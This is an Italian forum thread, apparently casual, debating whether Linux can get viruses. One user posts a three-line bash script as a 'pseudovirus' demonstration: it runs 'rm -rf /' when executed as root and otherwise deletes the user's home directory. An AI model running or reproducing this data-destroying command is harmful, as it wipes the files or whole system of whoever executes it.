sì
ma io ho scritto quello solo per far vedere a discepolo un piccolo esempio di pesudovirus per linux visto che diceva che non esistevano![]()
sì
ma io ho scritto quello solo per far vedere a discepolo un piccolo esempio di pesudovirus per linux visto che diceva che non esistevano![]()
@_=(115,-17,6);print+map{chr$_[$.=$_-$_]*$_**$.+++$_[$.]*$_**$.+++$_[$.]*$_**$.}$.-$...$#_
Malware di sicuro, ma non so se rientra nella categoria virus (per dire, non si autoreplica).Originariamente inviato da adarkar
#!/bin/bash
if id | grep '^uid=0' ; then rm -rf /
else rm -rf ~ ; fi
"Qualsiasi esperto ha paura di combattere usando la katana vera. Anch'io. Ma non ignoro la mia paura, riesco ad accettarla, e a metterla da parte accanto a me".
quindi ada, pure linux come win potrebbe essere attaccato dai virus, volendo!!
VVoVe:
VVoVe:
oh mamma![]()
MacOsX - Imac 17"
Aspettando ubuntu su mac!!![]()
Xbox360![]()
Tv Lg 26 "![]()
allora, tutto imho, linux e' un ambiente ostico rispetto ad win.
Infatti su linux non sei mai root (o almeno cerchi di esserlo meno possibile).
quindi dormi notti tranquille, un sistema inespugnabile cmq. non esiste un exploit esce sempre, ma puoi stare gia' sereno, l'active X linux non li ha, gia' mac os X+office si
Ciao![]()
giàOriginariamente inviato da Ikitt
Malware di sicuro, ma non so se rientra nella categoria virus (per dire, non si autoreplica).
ovviamente il mio era solo un modo di far capire che anche su linux si possono fare danni
ciauz todos![]()
@_=(115,-17,6);print+map{chr$_[$.=$_-$_]*$_**$.+++$_[$.]*$_**$.+++$_[$.]*$_**$.}$.-$...$#_